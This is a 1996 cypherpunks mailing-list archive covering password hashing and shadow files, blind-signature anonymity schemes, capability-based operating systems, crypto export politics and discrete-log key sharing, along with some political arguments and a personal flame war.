-------jehill@<gauss.elee|galaxy.csc|w6bhz|tuba.aix>.calpoly.edu--------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Sun, 17 Nov 1996 06:21:58 -0800 (PST)
To: "Joshua E. Hill" <jehill@w6bhz.calpoly.edu>
Subject: Re: RFC: A UNIX crypt(3) replacement
In-Reply-To: <199611170451.UAA05059@hyperion.boxes.org>
Message-ID: <Pine.LNX.3.94.961117141454.2208A-100000@random.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 16 Nov 1996, Joshua E. Hill wrote:

> 
> 	I'm trying to think of a function to replace UNIX's crypt(3).  
> My design criteria are as follows:
> 

Why? UNIX passwords with password shadowing are as secure as any password
system is going to get.  If your security holes are with passwords, its
because your admin is to lazy to install needed security provissions, not
because the system of checking passwords is bad.

If you're worried about network sniffing and the like, get SSH.  Other
than that you're wasting your time.

 --Deviant
Without followers, evil cannot spread.
                -- Spock, "And The Children Shall Lead", stardate 5029.5







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Kinchlea <security@kinch.ark.com>
Date: Sun, 17 Nov 1996 14:18:42 -0800 (PST)
To: The Deviant <deviant@pooh-corner.com>
Subject: Re: RFC: A UNIX crypt(3) replacement
In-Reply-To: <Pine.LNX.3.94.961117215609.504A-100000@random.sp.org>
Message-ID: <Pine.LNX.3.95.961117141640.1181M-100000@kinch.ark.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 17 Nov 1996, The Deviant wrote:
> 
> Oh.. you misunderstand what I'm saying... I'm not saying its unemportant
> for you to have good passwords or anything like that, I'm just pointing
> out that rather than replace the entire system, its more prudent to fully
> install it.
> 
> I still think admins should run crack against their own lists, etc., but
> that still shouldn't be a problem to a good cracker.  If you've just
> gotten root on a system, you start backdooring everything, not trying to
> crack the password list.

Well, this certainly *IS* a different statement than I read from you
before. I don't find anything to disagree with here. Though, if your
passwords can't be cracked, what is the need for shadow passwords? It
simply introduces more variables and offers no more security.

cheers





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Kinchlea <security@kinch.ark.com>
Date: Sun, 17 Nov 1996 14:52:58 -0800 (PST)
To: The Deviant <deviant@pooh-corner.com>
Subject: Re: RFC: A UNIX crypt(3) replacement
In-Reply-To: <Pine.LNX.3.94.961117222029.564A-100000@random.sp.org>
Message-ID: <Pine.LNX.3.95.961117145015.1181N-100000@kinch.ark.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 17 Nov 1996, The Deviant wrote:
> > 
> > Well, this certainly *IS* a different statement than I read from you
> > before. I don't find anything to disagree with here. Though, if your
> > passwords can't be cracked, what is the need for shadow passwords? It
> > simply introduces more variables and offers no more security.
> 
> While thats all well and good, its also easier said than done.  A creative
> cracker can beat a lot of password filter routines.  As somebody said to
> me earlier, belt _and_ suspenders works best. ;)

Agreed, for a large number of users (say >1,000) it is quite difficult
for one thing, running crack can be too time consuming to be feasible. 
For a small number of users (many of the LANs I administer have less
than 30 users), however, it is not at all difficult. It helps, of
course, if you can trust your local users --- possible when there are
only a few and you know them all, impossible when there are many and
they are faceless. 

The less work I have to do to keep the systems/network secure, the more
time I can make available for *real* work on those system. Few sites can
afford a full-time security person, that is the reality that I live in
anyway. 

cheers, kinch






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Mon, 18 Nov 1996 08:50:24 -0800 (PST)
To: aga <aga@dhp.com>
Subject: Re: [REBUTTAL] Censorship on cypherpunks?, from The Netly N
Message-ID: <848332398.56610.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


 
> If you do not send it to me by e-mail, I will never see it.
> Why are you so paranoid that someone is reading your e-mail?
> I never do anything criminal, so I could give a shit less if
> everybody reads all of my fucking mail.

I was trying hard not to get into this thread as it is basically just 
one long flamewar that is getting out of control but I have to 
comment here:

There need be no reason for paranoia. I don`t call it paranoia, I 
call it constant vigilance, to demonize it is a statist position and 
tries to ostricise those who protect their privacy. 

Whether you do anything criminal or not is not the point. Indeed I 
would say that 90-95% of encryption usage is for perfectly legal 
purposes, and only about 0.1% of encrypted material is concerned with 
unethical acts rather than illegal acts. The point is you should 
retain the right to protect your privacy. 
Sure, it`s not illegal to  put forward anarchist arguments in mail today, 
but do you really want your company boss knowing about it? 
 I personally don`t work - I`m a student so it doesn`t matter to me, 
but whether it is right that your employement and political views should 
affect each other they do, so you should be able to protect yourself 
with technology...




 

  Datacomms Technologies web authoring and data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: 5BBFAEB1
     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Mon, 18 Nov 1996 09:52:35 -0800 (PST)
To: Hal Finney <hal@rain.org>
Subject: Re: Members of Parliament Problem
Message-ID: <848332398.56609.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



> I don't quite follow how this would work.  If Trent issues a blind
> signature, then that means (doesn't it?) that he doesn't see what he
> is signing.  So how can he confirm that the message is actually from
> a member of the group when he doesn't see it?

I should have elaborated a little on this.

My idea was that trent should be able to decrypt the message and 
verify it was meaninful (at least probably so) by some form of 
frequency analysis, as he would be a computer program this would not
be a significant time loss in a system with few users (such as 
parliament as suggested with the initial problem)
if the resulting message didn`t have approximate 
frequency distributions of letters you would expect in natural 
langauge or source code or whatever the message would not be 
published as it is probably an invalid key being used thus decrypting 
to garbage. A better way to do all this would probably just be to 
have Bob sign the message then Trent strip the signature before 
signing it himself but I just dashed this off as a quick response 
without really thinking it through. A nicer protocol would be one 
where the key distribution is easier initially (isn`t this always the 
case ;-)) or even a protocol which isn`t arbitrated, like your reply 
said Chaum mentions protocols for this.



 

  Datacomms Technologies web authoring and data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: 5BBFAEB1
     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Sun, 17 Nov 1996 15:35:20 -0800 (PST)
To: cypherpunks@toad.com
Subject: re: San Jose Mercury News declares encryption battle over
Message-ID: <199611172320.PAA27704@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Dale how long have you been awake? Take a gander at Wei Dei's Crypto++, Peter Gutman's cryptlib, 
and the half dozen other public domain multi algo source libs available at your finger tips.

Anyone with a compiler on just about any platform has access to implementations of blowfish,
idea, des, gost, the gamut.

So Dale, get coding.

diGriz





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 17 Nov 1996 15:02:37 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Taxation Thought Experiment
In-Reply-To: <199611162345.RAA02111@manifold.algebra.com>
Message-ID: <wk2JXD35w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


ichudov@algebra.com (Igor "FUCK MNE HARDER" Chudov @ home) writes:
> Dr.Dimitri Vulis KOTM wrote:
> > > >  3) Company pay shareholders and costs, $30 is left
> > >
> > > Again, no.  Shareholders come AFTER payroll and costs.
> >
> > Dividends are NOT tax-deductible in the U.S. On the other hand, interest is
> > Therefore it's sometimes more profitable for a company to raise money by
> > issuing bonds (debt) and paying tax-deducuble interest than by selling its
> > stock (equity) and paying non-decuctible dividentds to stockholders.
>
> This statement is very questionable. Various classes of shareholders
> (such as pension funds and IRA account holders, among others) pay no
> taxes on dividends. Corporations pay taxes only from about 30% of
> dividend income that they receive.

Igor, you begin to sound like an American - i.e., even more stupid than the
50%sovok that you are.

I never said anything about the taxes paid by the dividend _recepients.

> There is, in fact, a neat theorem that says that (*_under certain
> assumptions_*) the value of a firm does not depend on its capital
> structure.

Igor, you begin to sound just like Timmy May - talking about things you know
nothing about. Yes, there's a famous theorem by Franco Modigliani and Merton
Miller, the Nobel prize winners which says that ABSENT TAXES, the value of the
firm doesn't depend on its debt-to-equity ratio. M&M also show that under U.S.
tax laws the best capital structure is 100% debt (again, ignoring other
available deductions, such as depreciation, and increased risk and cost of
borrowing as the debt increases).

"The value of the levered firm is the value of the levered firm plus the
interest tax shield (the amount of debt times the tax rate)."

Companies would borrow less (and people would take out mortgages on their
residences less) if the interest payments weren't tax-deductible.

> > > >  5) I pay 40% in taxes, so $18 left
> > >
> > > I'm afraid you are conflating the MARGINAL rate (and when you consider
> > > federal, state and local taxes varies by state) with the AVERAGE rate.
> > > Here in FL. for example there is no state or local income tax.  With tax
> > > sheltering, mortgage deductions etc. no one pays 40% -- the middle class
> > > pay a lower average rate, the upper class pay a much lower average rate.
> >
> > That varies with the locale - here I pay the federal income tax plus the Ne
> > York State income tax plus the New York City income tax. I once had a job o
> > from IBM at $79K/year in Boca Raton (which I eventually didn't take anyway)
> > it's a ridiculous salary in NYC, but a decent one in Florida.
>
> You forget about alligators.

And sharks.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@vesuvius.ai.mit.edu
Date: Sun, 17 Nov 1996 12:43:29 -0800 (PST)
To: snow <snow@smoke.suba.com>
Subject: Re: A Disservice to Mr. Bell
In-Reply-To: <199611170516.XAA02653@smoke.suba.com>
Message-ID: <9611172048.AA01493@vesuvius.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



Petro is right to point out that third largest party does
not mean being the third most influential. But by any standards
Perot is much more influential than an Libertarian candidate.
Perot has managed to get his views onto the national agenda.,
Browne has not.  The only mainstream party to have been in
any measure influenced by libertarian ideas is the Republicans
who are also the party of extreeme social authoritarianism,
even if they don't believe in it they have to fawn on Pat
Robertson's Christian Coalition to get through the primaries.

As for what happens in 2000 it does not appear that the
Republicans will have extricated itself from the religious
right's grip. This will probaly mean that they end up putting
up another compromise candidate like Dole. With Clinton sitting
so far to the right its very difficult for the Republicans
to find any response.

Unless something happens to change things I don't see any
likelyhood of change the next time round. The only factor
likely to change anything would be for Congress to take
campaign finance reform seriously. I doubt that that is going 
to happen because the last Congress sold favours more openly
than any since 1876. During the Communications Decency Act
politicing I was somewhat suprised to find out the cost
of the lobbying effort, after all it shouldn't take more than a 
few plane tickets to send the right people down to DC. Then
I found out that the main cost was buying into the committee
system to get a hearing. I'm not saying that one side or
the other is worse but the tone of the Congress was pretty much
set by Newt Gingrtich accepting an inaugural bribe of a couple
of million from Murdoch, alledged advance payment for a book
that was pulped.

There are good reasons why the rest of the world tends to
turn off when told about America as the "home of Democracy".

	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joshua E. Hill" <jehill@w6bhz.calpoly.edu>
Date: Sun, 17 Nov 1996 16:02:10 -0800 (PST)
To: deviant@pooh-corner.com (The Deviant)
Subject: Re: RFC: A UNIX crypt(3) replacement
In-Reply-To: <Pine.LNX.3.94.961117232804.812A-100000@random.sp.org>
Message-ID: <199611180000.QAA15865@hyperion.boxes.org>
MIME-Version: 1.0
Content-Type: text/plain


> This is backwards logic; when security begins to hender in the
> functionality of the system, the security needs to be gotten rid of.
hmmm... Now that _completely_ depends on the system.  Now for the system
I administer, the level of security really isn't _that_ high (on the
grand scale of things).  It is, however, high enough that I inconvenience
the users with a pro-active password guesser, and passwords that expire
occasionally.  I suppose that this is a _minor_ inconvenience, but it
raises the level of security a very large amount.  On a less mundane
system (one run by the government, say), security is only _slightly_
less important than being able to use the system in the first place. :)
On this type of system almost any inconvenience is worth the cost.

> > You have previously said that the passwd file should not be available 
> > for public consumption.  Though this is certainly true, it does not
> > hurt that even if the passwd file is available, nothing particularly 
> > useful can be done with it.
> Hince you use pseudorandom password generators and crack.  If you count on
> somebody not being able to preform an opperation quickly, they'll usually
> prove you wrong.

whoa... didn't you just say:
> when security begins to hender in the
> functionality of the system, the security needs to be gotten rid of.
I think that psedu-random password generators would almost certainly
"hinder in the functionality of the system"...  :-)

I want to make it so that users can use passwords > 8 characters, and I 
want to use something a bit better than FreeBSD's solution.  Whether or 
not this is necessarily the One True Way (TM) to security, it will increase
security.  I'm not saying "Hey everyone.  Here is a spiffy new password
system that will make your entire system completely secure!"  I'm saying
"Could everyone please look at this algorithm that I'm thinking of using.
Could you please comment on it, so that I can make it better."  That's it.
All questions on whether or not passwords should shadowed, crackable,
not crackable, or consisting only of the letter "e", aside.  Is this
algorithm secure, and if not, why not.

				Joshua

>  --Deviant
> The Macintosh is Xerox technology at its best.
I very much like your signature... very nice... 

-----------------------------Joshua E. Hill-----------------------------
|                             Allen's Law:                             |
|           Almost anything is easier to get into than out of.         |
-------jehill@<gauss.elee|galaxy.csc|w6bhz|tuba.aix>.calpoly.edu--------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Mon, 18 Nov 1996 10:54:15 -0800 (PST)
To: cypherpunks@toad.com
Subject: Playing card cryptosystems
Message-ID: <848332390.56562.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



> Also I did hear tell that Bruce Schneier was working on a crypto
> algorithm which was designed to work with playing cards, for a book
> which Neal Stephenson is writing.  Presumably painful to use, but
> maybe good plausible deniability, all that you need is a pack of
> cards.

Not even that in fact, there are methods, and I can confirm they work 
because I can do it myself, that allow one to memorize the order of a 
pack of playing cards, some people can even do it with up to 8 packs, 
although this requires a more complicated method. So while encryption 
requires one to have the cards ready (about 8 good riffle shuffles 
will restore a high degree of randomness to a deck) you can keep the 
pad for short messages in your head. But one can do the same with one 
time pads that use other plaintexts as the pad.

 

  Datacomms Technologies web authoring and data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: 5BBFAEB1
     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rcgraves@ix.netcom.com>
Date: Sun, 17 Nov 1996 16:02:16 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Members of Parliament Problem
In-Reply-To: <v02140b05aeb518d83c92@[192.0.2.1]>
Message-ID: <328FA7FD.6B69@ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Peter Hendrickson wrote:
> 
> At 1:39 PM 11/17/1996, Simon Spero wrote:
> >
> > Why not use  blinding for obtaining the certificate?
> 
> > Create a number up public/private key pairs, blind them, then do the
> > cut-and-choose thing with the security officer. He signs the blinded 
> > key, then returns it. Unblind the remaining pubic key, and you've 
> > got a public key with the appropriate signature on it.
> 
> Okay, this would work.  But, it requires that all (or at least many) 
> of the Members of Parliament cooperate.  If not, then the security 
> officer will be able to make very good guesses about who is speaking.
> 
> Parliamentarians may not cooperate for a variety of reasons.  They may
> not wish to be attacked by terrorists for the words of others.  They
> may believe that cowardice is not to be encouraged.  They may not x
> officer will in anonymity.  It might be too hard for them.

Moreover, parliamentarians from different sides of the aisle usually
have different points of view, and an interest in "outing" each other.
A parliament where everyone had the same point of view would be
uninteresting for this problem -- your friendly local terrorist would
just blow up the whole building.

A practical example of this kind of thing is the situation of judges
in Colombia.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 17 Nov 1996 15:00:55 -0800 (PST)
To: cypherpunks@toad.com
Subject: More lies from Timmy [fart] May
In-Reply-To: <v03007800aeb405c5abe0@[207.167.93.63]>
Message-ID: <gF4JXD36w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Timmy May <tcmay@got.net> farts:
> Fact is, I now have more people in my Eudora filter file that at any time
> in the four years this list has existed. Also a fact, there are more people

I don't believe Timmy.

> on this list that at any time in history (despite what some of the New Wave
> journalists are writing about "the death of the Cypherpunks list").

This censored forum has no credibility, irrespective of the number of
subscribers.

> I suspect John Gilmore made a tactical error in kicking Vulis off the list,

Timmy tacitly admits that he lied when he claimed that no one had kicked me
off the list.

> has never imposed restrictions on topic, membership, etc. This one case
> involving Vulis was well-described by John: he asked Vulis to stop sending
> 50K byte rants about the Armenians and Turks to the list--consider that
> 50KB x 1500 destinations = 75 MB of outgoing traffic, modulo corrections
> for aliases, compression, etc.

If that's how John Gilmore described it, then he's lying again. He never said
anything to me about the size of my messages, only about their contents.

Moreover if John Gilmore had a problem with the size of articles being sent
to his private mailing list, he would have configured majordomo not to
broadcast submissions above a certain size, the way most majordomo mailing
lists are configured.

John Gilmore is clearly a liar.

> Yes, this message is itself likely to trigger at least a couple of "More
> lies from Timmy [fart] May" spews from Vulis, and a couple of incoherent

Of course Timmy May and John Gilmore would rather lie and not be called liars.

> rants from newcomers Stathis and Aga. I've been saying little on this
> issue, compared to dozens of Vulis rants every day (ironic that he calls
> _me_ the main ranter!)

This from the asshole who rants about "don't hire" lists, "crazy Russians",
and mormons...

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sun, 17 Nov 1996 16:18:31 -0800 (PST)
To: "Timothy C. May" <gnu@toad.com>
Subject: Re: HP announcing some International Cryptography stuff on Monday
Message-ID: <199611180018.QAA10957@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:49 PM 11/15/96 -0800, Timothy C. May wrote:
>It sounds ominous to me. Another backroom deal, probably for some form of
>key recovery strategy, aka GAK.

I'd bet GAK too.  RSADSI has been working on GAK protocols, so these ones
might actually work.  I feel as pessimistic about this one as Lucky usually
is.

At 12:05 PM 11/15/96 -0800, John Gilmore wrote:
>Are they the next Big Company to knuckle under to the Feds?  Their
>pcmcia-with-local-country-surveillance-chip-socket initiative never
>seemed to go anywhere.

Since I am inherently optimistic, one ray of light may be that the San Jose
Mercury News was mentioning the ability to export the system, and then when
the necessary licenses (US and foreign) were obtained, turn on the
encryption.  I guess from this that the encryption is in hardware.  Now,
software/hardware interfaces are usually fairly simple, so what we have
here is a software system with a crypto hook.


-------------------------------------------------------------------------
Bill Frantz       | The lottery is a tax on    | Periwinkle -- Consulting
(408)356-8506     | those who can't do math.   | 16345 Englewood Ave.
frantz@netcom.com |       - Who 1st said this? | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sun, 17 Nov 1996 16:18:36 -0800 (PST)
To: ichudov@algebra.com (Igor Chudov)
Subject: Re: ideal secure personal computer system
Message-ID: <199611180018.QAA10981@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:24 AM 11/16/96 -0600, Igor Chudov @ home wrote:
>Bill Frantz wrote:
>> Protection against strangers walking up to your machine and using it is
>> nice, and easy to do.  Protection against viruses which install Trojan
>> horses in your system would also be nice, but is very hard to do in systems
>> where programs run with all the privileges of their users.  Examples
>> include (in alpha order): DOS, MacOS, Unix, and Windows (including NT).
>
>I wonder what are the operating systems where programs may be run with
>_less_ privileges than the user who starts them? Is VMS one of such 
>systems?

Ah, you touch on 20+ years of my professional life.  KeyKOS is such a
system as is EROS, a similar system being developed at University of
Pennsylvania.  See:

http://www.cis.upenn.edu:80/~eros/
http://www.cis.upenn.edu/~KeyKOS/
http://www.agorics.com/agorics/allkey.html - For KeyKOS documentation.

In general these systems provide an execution environment where programs
only have access to the resources they need.  Think of it as a Unix chroot
jail which is specifically designed for each program.  Then add controlled
communication links back to the user's terminal and you get the idea. 
Unless a program has a need to write the system file, it won't have the
privilege, even if it's user does have the privilege.


-------------------------------------------------------------------------
Bill Frantz       | The lottery is a tax on    | Periwinkle -- Consulting
(408)356-8506     | those who can't do math.   | 16345 Englewood Ave.
frantz@netcom.com |       - Who 1st said this? | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sun, 17 Nov 1996 16:18:55 -0800 (PST)
To: John Fricker <chudov@algebra.com
Subject: RE: ideal secure personal computer system
Message-ID: <199611180018.QAA11009@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:51 PM 11/16/96 -0800, John Fricker wrote:
>In WinNT a program may impersonate a user such as Guest. Also, trojan horses
>are ineffective in NT as typical users do not have write permission to system
>binaries. 

I assume that administrators only run programs from trusted libraries and
do not include their current directory in their path.  They never run
programs that aren't directly related to systems administration etc. etc.
etc.  The typical Trojan horest sits around until someone with the proper
authority runs it.

That is not the way NT is used at one large commercial operation I am
somewhat familar with.  (I'm being obscure to protect the guilty.)  I think
there are very few NT (or Unix) systems which are administrated with a safe
level of paranoia.  I would like to see more compartmentalization in the
system.

(Note that even if it only runs with a user's privileges, a Trojan horse
will have no problem stealing e.g. that user's PGP secret key ring.  Not
everything of value is in system files.  Question, can a user-level Trojan
horse insert itself as a keyboard monitor and get the PGP pass phrase as
well?)


-------------------------------------------------------------------------
Bill Frantz       | The lottery is a tax on    | Periwinkle -- Consulting
(408)356-8506     | those who can't do math.   | 16345 Englewood Ave.
frantz@netcom.com |       - Who 1st said this? | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Scanlon <tfs@adsl-122.cais.com>
Date: Sun, 17 Nov 1996 13:32:10 -0800 (PST)
To: dave@kachina.jetcafe.org (Dave Hayes)
Subject: Re: Censor John Gilmore -- EFF is a disgrace!
In-Reply-To: <199611172111.NAA04310@kachina.jetcafe.org>
Message-ID: <9611172131.AA06063@adsl-122.cais.com>
MIME-Version: 1.0
Content-Type: text


Dave Hayes wrote;
> 
> 
> You call yourself on cypherpunks, and you blithely assume that a
> Phrack author actually signs his real name? 
> 
> Either I thought you guys were *real* hackers and you aren't, or
> this is a very funny troll.

To quote the editors of phrack on this: "Hey, he submitted it and we published it".

If Dimitri wants to deny submission it's up to him. Plenty of people regularly
publish stuff in Phrack using either their real names, or aliases that are
so well connected with their real names as to be inseperable.

Cypherpunks are not hackers, don't confuse the two. 

Tim






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charles Platt <cp@panix.com>
Date: Sun, 17 Nov 1996 13:53:39 -0800 (PST)
To: cypherpunks@toad.com
Subject: Emergency powers
Message-ID: <Pine.SUN.3.91.961117164425.15672A-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Of course, Michael Froomkin is right in everything he says about
presidential emergency powers. But an unconstitutional abuse of power is
surely not acceptable merely because it has become a routine method for
accomplishing everyday legislative tasks.  First, it allows significant
possibility for future abuse; and second, if the Constitution is routinely
circumvented, this diminishes its general power (as any law loses its
power when it is routinely flouted). The situation is all the more
troubling because it receives so little publicity, outside of militant
"extremist" groups (i.e. those that are crazy enough to believe that
presidential power should be limited in accordance with the law of the
land). When a president can take almost action under the excuse that it's
a "national emergency" (when in fact there is no emergency), and he
doesn't have to answer questions till later, and most citizens are unaware
of this, we have a potentially dangerous situation. They key word here is
"potentially." Michael Froomkin seems relatively sanguine because the
potential for great harm has not been realized. I am not so easily
reassured. 

--Charles Platt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Minow <minow@apple.com>
Date: Sun, 17 Nov 1996 17:38:46 -0800 (PST)
To: Hal Finney <hal@rain.org>
Subject: Re: Computer CPU chips with built-in crypto?
In-Reply-To: <199611172105.NAA04230@crypt.hfinney.com>
Message-ID: <v03007803aeb55bc5644c@[17.219.103.245]>
MIME-Version: 1.0
Content-Type: text/plain


Hal Finney writes:

>Another possible application for the built in encryption is software
>piracy protection.  ...  In these days of razor thin profit
>margins in the PC business it is hard to see how this will sell.
>

Let me offer a possible scenario: we're entering an era when
there is much more chip real-estate than "consumer-grade" PC's
can use. Adding an encryption engine to the instruction stream
could be as simple as adding a series of barrel shifters between
(or inside) the processor cache and the instruction decoder.
(Imagine blowfish or DES -- or something as simple as RC4).

If encryption is turned off, the chip would be bug-for-bug
compatible with the existing PC. The vendor would put the
chip into the ordinary production cycle and, in two to
three years, it would be on the target audience's desktops.
(Remember, it would run existing and new, non-encrypted,
software without change.)

Encryption would be turned on on a module-by-module basis by
operating system "loader" code that would detect a "key required"
cookie in the executable file (or the Open Doc file, or
the Java class file). Before starting the module, the
o.s. loader would lookup the cookie and load the decryption
key into the chip. The customer would purchase a key by
giving a magic number from the software and a magic number
(processor serial number) to the vendor. This could be
done automatically over the network.

Now, a software vendor could provide the latest software for
free from a public FTP site, and could offer a variety of
decryption keys (30 day free trial, one-time-use micropayment,
etc.) at a variety of prices. This could also be integrated
into multiple site-license managers such as KeyServer.
As with KeyServer, key management could be done "invisibly"
over the Internet.

Note that the chip does not offer end users any encryption
or decryption capabilities -- the decrypted instruction
stream cannot be directly examined by end users. On the
other hand, if the encryption key generator was available
to "anybody," it would be trivial to construct secret
messages by generating programs that, when run, constructed
the desired message. For that reason, I suspect that
keys will be limited to a length that "national interests"
are comfortable with.

Martin Minow
minow@apple.com













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Sun, 17 Nov 1996 09:28:56 -0800 (PST)
To: Adam Shostack <adam@homeport.org>
Subject: Re: RFC: A UNIX crypt(3) replacement
In-Reply-To: <199611171432.JAA02213@homeport.org>
Message-ID: <Pine.LNX.3.94.961117172527.2314A-100000@random.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 17 Nov 1996, Adam Shostack wrote:

> The Deviant wrote:
> | On Sat, 16 Nov 1996, Joshua E. Hill wrote:
> | > 	I'm trying to think of a function to replace UNIX's crypt(3).  
> | > My design criteria are as follows:
> 
> | Why? UNIX passwords with password shadowing are as secure as any password
> | system is going to get.  If your security holes are with passwords, its
> | because your admin is to lazy to install needed security provissions, not
> | because the system of checking passwords is bad.
> 
> 	A longer salt would make running crack against a large
> password file slower.

While thats all well and good, it shouldn't be necisary.  If passwords are
shadowed, one must have root access before one can run crack against the
password list, at which time it is innefective.

> 
> Adam
> 
> -- 
> "It is seldom that liberty of any kind is lost all at once."
> 					               -Hume

Nice sig... I think I'll add it to my list...

 --Deviant
"First things first -- but not necessarily in that order"
                -- The Doctor, "Doctor Who"






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: janke@unixg.ubc.ca
Date: Sun, 17 Nov 1996 17:36:18 -0800 (PST)
To: cypherpunks@toad.com
Subject: DSA over Elliptic Curves
Message-ID: <199611180136.RAA00729@clouds.heaven.org>
MIME-Version: 1.0
Content-Type: text/plain



Has anyone implemented this yet? I am going to and was wondering
what good sizes for q (the prime corresponding to the
160 bit prime in DSA) and p (the prime corresponding to the 
512-1024 bit prime in DSA) would be?

Leonard





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal Finney <hal@rain.org>
Date: Sun, 17 Nov 1996 17:40:29 -0800 (PST)
To: ses@tipper.oit.unc.edu
Subject: Re: Members of Parliament Problem
Message-ID: <199611180140.RAA04560@crypt.hfinney.com>
MIME-Version: 1.0
Content-Type: text/plain


From: ph@netcom.com (Peter Hendrickson)
> At 1:39 PM 11/17/1996, Simon Spero wrote:
> > Create a number up public/private key pairs, blind them, then do the
> > cut-and-choose thing with the security officer. He signs the blinded key,
> > then returns it. Unblind the remaining pubic key, and you've got a public
> > key with the appropriate signature on it.
>
> Okay, this would work.  But, it requires that all (or at least many) of the
> Members of Parliament cooperate.  If not, then the security officer will
> be able to make very good guesses about who is speaking.
>
> Parliamentarians may not cooperate for a variety of reasons.  They may
> not wish to be attacked by terrorists for the words of others.  They
> may believe that cowardice is not to be encouraged.  They may not believe
> in anonymity.  It might be too hard for them.
>
> What I would like to see is a method which relies only on published
> public keys and no other cooperation from the people who are (more
> or less) being used as shields.  This may be impossible.

The 4th method of Chaum's, from Eurocrypt 91, somewhat satisfies this,
as does a method from the Eurocrypt 94 paper.  Each person can choose
his own public key g**x for a discrete log system.  However, the problem
is that all members of the group have to choose the same prime p as the
modulus, and generator g, for their discrete logs.

The issue of using a common modulus in discrete log systems has been
somewhat controversial.  I think when the government first proposed DSS
they planned to do something like this, one modulus with everyone having
different secret x values with corresponding public keys y = g**x mod p.
This has the advantage that public keys are smaller since everyone uses
the same g and p.  So all you need is one value for your public key.
Without this you have to have g, y, and p be your public key so it is
3 times bigger.

The problem is that the way the main discrete log algorithms work,
once you have broken one discrete log for a certain g and p you can break
all the others very easily.  So the particular g,p pair which is chosen
for everyone to share becomes one very big, fat target to try to apply
discrete log algorithms.

Now this is not necessarily as bad as it seems.  Unlike the case with RSA,
there is no secret information which could be leaked to make solving these
discrete logs easier.  Nobody knows how to do it.  So the only way it can
be done is by a massive operation roughly similar to factoring an RSA
modulus the size of p.  Choosing p of 1000 or 2000 bits should still make
it effectively impossible for anyone to do this.  The numbers are simply
far too large.

Still the consensus of opinion with discrete logs is that the advantages
of slightly smaller keys have not been great enough to justify the risk
involved in having eveyone share a modulus, even though that risk is
seemingly insignificant.  On the other hand maybe for cases like this
the additional advantages to common moduli would be enough to tilt the
argument in the other direction.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
